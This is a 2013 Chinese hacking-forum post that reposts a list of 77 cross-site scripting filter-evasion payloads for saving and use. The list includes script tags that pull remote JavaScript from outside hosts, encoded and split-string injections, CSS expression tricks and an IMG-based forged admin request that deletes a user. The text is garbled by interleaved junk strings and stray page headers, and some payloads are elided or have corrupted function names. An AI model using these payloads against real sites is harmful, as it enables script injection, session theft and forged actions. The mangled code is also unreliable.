找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2726|回复: 0
打印 上一主题 下一主题

XSS攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:22:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
4 ]( U  q9 A$ Z$ F% [( G; a9 x(1)普通的XSS JavaScript注入" P3 i, ^- q1 k/ X$ K  A
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
- x- z# @8 ?: [: K(2)IMG标签XSS使用JavaScript命令
9 t- g2 Q* s4 O# n; i  I/ Z3 m<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
7 C* D8 |$ q# b(3)IMG标签无分号无引号
- S, @' D! x) K) c<IMG SRC=javascript:alert(‘XSS’)>. Y& }- {/ U5 I- }9 g, l
(4)IMG标签大小写不敏感3 u  F' J! S9 [+ a& J
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
+ Z/ ^- b- u' n  U: @5 U8 h$ c$ D(5)HTML编码(必须有分号). s! K; u! s( d% r
<IMG SRC=javascript:alert(“XSS”)>
1 [7 _! w/ ^# X- m. k% \  q(6)修正缺陷IMG标签
9 b* f8 d$ H1 m1 q3 i! u  d4 A<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>6 T- U/ M. `) U1 G

7 F5 g  m% A. R& r3 w# ?
+ D6 ^, s9 O- T& H5 I( g(7)formCharCode标签(计算器)* j3 x, e2 f, }3 @6 U1 ~% _3 D
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>7 B3 E. ?9 R1 y  c
(8)UTF-8的Unicode编码(计算器)
9 _. w4 K# ?0 A! ?<IMG SRC=jav..省略..S')>% r- [+ z8 E$ M  A6 v6 F$ n5 {* }
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)- _. `' k( t+ |' Z) M; W
<IMG SRC=jav..省略..S')>9 G; g% n# p' z
(10)十六进制编码也是没有分号(计算器)
$ X+ Z* a' Q1 n* N<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>: L2 E# N" W% N2 i: P/ \
(11)嵌入式标签,将Javascript分开# P, ]  O# ^! m+ {9 n" P
<IMG SRC=”jav ascript:alert(‘XSS’);”>
: c& k8 b' Y$ p: h(12)嵌入式编码标签,将Javascript分开- T& z* D0 s6 b: |# K
<IMG SRC=”jav ascript:alert(‘XSS’);”>% _/ \) c5 @& F" u$ I& h
(13)嵌入式换行符" u( {3 n" g4 \5 i
<IMG SRC=”jav ascript:alert(‘XSS’);”>
7 D" B7 ]' m2 J& r1 ?( _7 o(14)嵌入式回车4 V2 C6 [. C2 v5 v$ `9 j* g7 f
<IMG SRC=”jav ascript:alert(‘XSS’);”>9 b2 U) x3 }0 K6 f3 d. z
(15)嵌入式多行注入JavaScript,这是XSS极端的例子0 d7 C6 m* R, p" M% _2 |
<IMG SRC=”javascript:alert(‘XSS‘)”>
/ ?5 t1 h, u5 Z! j% y2 P& f: J3 \1 A7 x(16)解决限制字符(要求同页面)
- F: i8 w. y- G' R- ~<script>z=’document.’</script>3 x; s. A$ j3 r# j7 f
<script>z=z+’write(“‘</script>0 H3 ^, T# Y8 S
<script>z=z+’<script’</script>
0 i+ }6 B  d5 z8 A% ?0 N<script>z=z+’ src=ht’</script>
- J0 i. c) z8 O<script>z=z+’tp://ww’</script>- H- i/ M: B. S( _' M& u
<script>z=z+’w.shell’</script>
6 n0 g$ w; T; N% o<script>z=z+’.net/1.’</script>
: z: k+ {0 D6 L/ w/ f<script>z=z+’js></sc’</script>& @# \, v: C! I& q1 T
<script>z=z+’ript>”)’</script>
/ R3 J0 x8 T! ?3 ~5 T<script>eval_r(z)</script>) q# c8 g, p8 W$ ^9 c* k; |
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
/ ~7 {) p! ~( a. A# v) A6 rhttps://www.t00ls.net/viewthread ... table&tid=15267 2/6
& X; C8 ]: _1 U1 nperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
5 Q  m% w( U; f/ H(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用+ F* g: {8 p0 {1 \, B7 u9 q
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out: e% y' L  {# k& u) \
(19)Spaces和meta前的IMG标签5 {& r- A7 X5 ]4 |" z- ]
<IMG SRC=” javascript:alert(‘XSS’);”>8 O" i, d+ V4 s6 Z0 @" t
(20)Non-alpha-non-digit XSS1 {5 W2 t& G& v+ f, Q) k( v
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
9 n7 I  t) R# O9 C- C(21)Non-alpha-non-digit XSS to 2
0 x5 i# E8 D+ ?: R4 l6 m<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
5 S  T! W- m( I5 r; I(22)Non-alpha-non-digit XSS to 3* e' ^4 V4 K3 i% G! Z9 E" G# H
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
* b6 Q( X0 ~3 Q3 {(23)双开括号
# T( M0 ~* u2 {0 t' y% @  r<<SCRIPT>alert(“XSS”);//<</SCRIPT>1 b! y5 V9 ]: d) y! e( r1 {9 x
(24)无结束脚本标记(仅火狐等浏览器)5 Z& ]" m* R% c
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>2 F+ b) k. K7 E$ l/ n; ~2 R$ z$ V# v
(25)无结束脚本标记2
. \% v5 e$ j  |+ b<SCRIPT SRC=//3w.org/XSS/xss.js>
  N1 B5 M# q% I(26)半开的HTML/JavaScript XSS
8 P! z+ r/ k4 g" g7 o$ i7 ]/ z: Q<IMG SRC=”javascript:alert(‘XSS’)”7 y! ?6 }9 o2 `$ r
(27)双开角括号
& o1 }- x. g- |, R, O% T& B: M0 m( O<iframe src=http://3w.org/XSS.html <
0 a( J! K8 W% r& t(28)无单引号 双引号 分号( D  P/ o3 y" k* {. Q
<SCRIPT>a=/XSS/+ U, N5 K6 h( y( p- t  @3 l6 J! H: `
alert(a.source)</SCRIPT>) H8 n; R% }$ w; k0 o
(29)换码过滤的JavaScript
* c( ~) t% E; }' I3 V\”;alert(‘XSS’);//) o' J4 m1 W4 ]& p/ K  h# n
(30)结束Title标签% F' q7 X$ Z8 \
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
3 E2 K$ W+ o& Z7 |# o" ~' M(31)Input Image6 s5 ~2 K4 w' V* \. a
<INPUT SRC=”javascript:alert(‘XSS’);”>
& u* q4 u1 A# x' d# L(32)BODY Image
/ M9 {; _' s) l! ^% Q<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
) D, j2 b: w) l' }' z5 W7 B, M. ~/ W# I(33)BODY标签
- G8 K* I: i: @* b<BODY(‘XSS’)>: N) j, B: t9 b! j8 H8 |& U
(34)IMG Dynsrc* X6 Z3 P. c$ b3 b$ c
<IMG DYNSRC=”javascript:alert(‘XSS’)”>7 v8 [. y( M( |3 ]
(35)IMG Lowsrc% F! o+ `2 v+ L; E6 r. f
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
' D. r# b  p7 H+ ~(36)BGSOUND
  l6 |! F" x4 ]1 D. k$ l* X<BGSOUND SRC=”javascript:alert(‘XSS’);”>
" C, d; I8 C+ S8 t& z(37)STYLE sheet
+ u8 i. ]0 L' P9 x6 y2 f0 W  [<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>) G( w0 z9 }1 U; |: I
(38)远程样式表- X% J8 Y9 U( Q3 U4 i9 Q: n
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>* z6 j8 n# E- O% P5 Q% c0 |9 U
(39)List-style-image(列表式)
8 G, l# N$ [$ S) S3 [<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS) \" }0 a& c9 }$ a& D+ ]9 u
(40)IMG VBscript2 m' j- K' I# M: C% X
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
2 I3 Q1 c$ R8 d  J( r( N(41)META链接url
  B" E: U( `( Q) M' }9 P$ r+ y9 d; r  R( O! u8 a8 r

+ T  [6 g5 d! e/ F0 `# [/ G<META HTTP-EQUIV=”refresh” CONTENT=”0;
' m1 w7 i+ y/ z) iURL=http://;URL=javascript:alert(‘XSS’);”>
3 f6 M. J6 s$ j" ?1 q(42)Iframe
5 Q) U9 ]  `. Y<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
8 R, _  Y6 |0 b, k" h  `; K8 _; Q% u(43)Frame2 H& G) }/ {# f/ K; X' [$ r
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board" [  u  K5 v8 o. v/ i. J1 t1 o
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
8 f5 I4 U+ d  B9 Y(44)Table6 a8 N: u5 Z; y" X* O* r* Q4 G
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
7 I  M1 z! C& Z+ z(45)TD4 O, [" u5 f6 K
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”># t4 s; f" O* f
(46)DIV background-image
  P3 Q) y- _- M1 X8 z<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”># C& J, @) C0 i4 p& c; m
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-' Q+ j  U" p' `# ]6 S
8&13&12288&65279)
9 f: @2 B. I8 C# m0 r. Q<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>) N6 j1 ?. m8 R
(48)DIV expression
7 b. e4 L4 f7 B6 B$ O8 h& E<DIV STYLE=”width: expression_r(alert(‘XSS’));”>/ a! ]& n; y2 t- R! S2 l
(49)STYLE属性分拆表达
9 t: q' ~. y6 K+ r  x<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
: L( ]4 N# M$ W0 Q(50)匿名STYLE(组成:开角号和一个字母开头): I! O, j9 ]9 U3 y) e0 V
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>/ |6 u! n' n7 x$ o/ [" W
(51)STYLE background-image1 Z9 H' J6 p0 A/ M
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A9 u+ a$ Q0 K# |0 p4 C
CLASS=XSS></A>
0 F& m+ Y5 X- v8 I5 ]: X  p7 I! D( q(52)IMG STYLE方式
& q4 n0 ?; I1 R7 T$ T" g: Aexppression(alert(“XSS”))’>- m0 Z0 S  u7 ~+ u- z1 y, G, o$ F* _
(53)STYLE background  D* u% P7 |9 o7 k3 k
<STYLE><STYLE4 f7 P# I2 Z6 Q' ~, |, F
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
, v9 y3 R" a% s0 s( b6 m! g(54)BASE6 \! m; {: J- Y& a  _- R  V
<BASE HREF=”javascript:alert(‘XSS’);//”>. H  U! }- Z  T# a$ j: ~' d2 A
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS& h8 y8 a6 G8 t4 r
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
( |" h. x+ A- s. |(56)在flash中使用ActionScrpt可以混进你XSS的代码. E0 `" H& d6 U  m  Z  q6 ]' \6 X8 s
a=”get”;$ q1 b9 N8 B* R1 `  B
b=”URL(\”";1 q  \3 j( b& ?: x2 F5 ^
c=”javascript:”;0 D8 y# v  h% \7 n) k
d=”alert(‘XSS’);\”)”;
0 v4 p1 ?0 d% v" J" |* Y$ ]$ Zeval_r(a+b+c+d);, M- a) i& |: [0 r  M+ x
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
! N' D: c! `/ P7 H& U7 \* l<HTML xmlns:xss>, N. S( F/ C+ Z% r  u
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
) z$ d1 f) O2 y) c<xss:xss>XSS</xss:xss>
1 {; c  U9 z9 \7 r$ ~# S  _& w</HTML>- _4 a4 V( s/ ~- l  m/ [# P" l
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
' x* j5 \% l$ o, T  I2 o<SCRIPT SRC=””></SCRIPT>6 i9 A/ i9 m* Y6 G: H. t- k# H
(59)IMG嵌入式命令,可执行任意命令
% x0 w7 Q3 r4 L* |3 {<IMG SRC=”http://www.XXX.com/a.php?a=b”>
* @0 f: a- k9 {5 V(60)IMG嵌入式命令(a.jpg在同服务器)5 m1 x! o8 X2 E+ s: R
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser! J  E+ n, |6 N2 K- E
(61)绕符号过滤5 y7 _" l/ B$ j) v* Z
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
: ?9 K/ |* e, A' P4 K7 p, d; x(62)
3 I, S. v4 y0 g* ]<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
9 g, x0 ?# _3 _6 [5 F& F(63)
% ^( G, T4 _! O/ q( \! x3 S<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>2 B& F1 y' V( ^; |: u
(64), g3 A) T' z1 N- Q% |! C: Y3 C# R
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>8 H1 U2 [8 K2 D1 I# H* u) y0 h
(65)- E% o1 \7 q# y4 H4 r. k$ C
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
6 o# o: z( @' x# i  v(66)12-7-1 T00LS - Powered by Discuz! Board
* F/ }3 |. O6 p, Q3 V: k0 i! Rhttps://www.t00ls.net/viewthread ... table&tid=15267 4/69 p8 g7 a  f% y+ g' n, I% ]
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
, j8 o5 ~  n* \2 a4 l(67)# P% {. Y7 s' U; _2 `
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
" l' U% ?4 o1 O5 R</SCRIPT>
! ], }1 o& b8 `! h/ L(68)URL绕行% b, G6 P2 X( i) ]9 L& z7 S
<A HREF=”http://127.0.0.1/”>XSS</A>6 L+ \. r, f! m4 `' A% x$ k
(69)URL编码
; s  \3 [7 ]; c: D* K<A HREF=”http://3w.org”>XSS</A>% z% O; I9 O! c; J! R
(70)IP十进制+ s. G2 `! l5 D3 i& N1 s3 K
<A HREF=”http://3232235521″>XSS</A>& ?8 ?5 N* p+ p8 T) K" D
(71)IP十六进制$ A1 B! O( |# X! i
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A># `4 h8 L; J" P- p, @
(72)IP八进制
- T7 J3 v8 B* I% u% `1 p+ e<A HREF=”http://0300.0250.0000.0001″>XSS</A>; C) f* U' `# {
(73)混合编码
# g: |! w( F2 x5 m9 ]<A HREF=”h
9 ~6 ]" f5 |; F$ btt p://6 6.000146.0×7.147/”">XSS</A>
# H1 M- Z/ `3 \9 x(74)节省[http:]$ H  e6 m& A; l4 b+ x* ^1 [
<A HREF=”//www.google.com/”>XSS</A>
) \' g. F- `: K3 O" j: |; B1 h(75)节省[www]
/ T, A8 z: w! M<A HREF=”http://google.com/”>XSS</A>, C' V% U2 j3 f; q5 L9 O
(76)绝对点绝对DNS' J. h( N5 E0 X) [  c
<A HREF=”http://www.google.com./”>XSS</A>
/ f0 {8 L9 r# U. F9 q4 W) x: x(77)javascript链接' t  M, `  N) z
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>0 P, Y3 q. [5 @" T( a

- `, k( k* }+ j( J7 D# I9 J原文地址:http://fuzzexp.org/u/0day/?p=14
. t5 q4 Q8 X% i
) z1 O" n* w  M
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表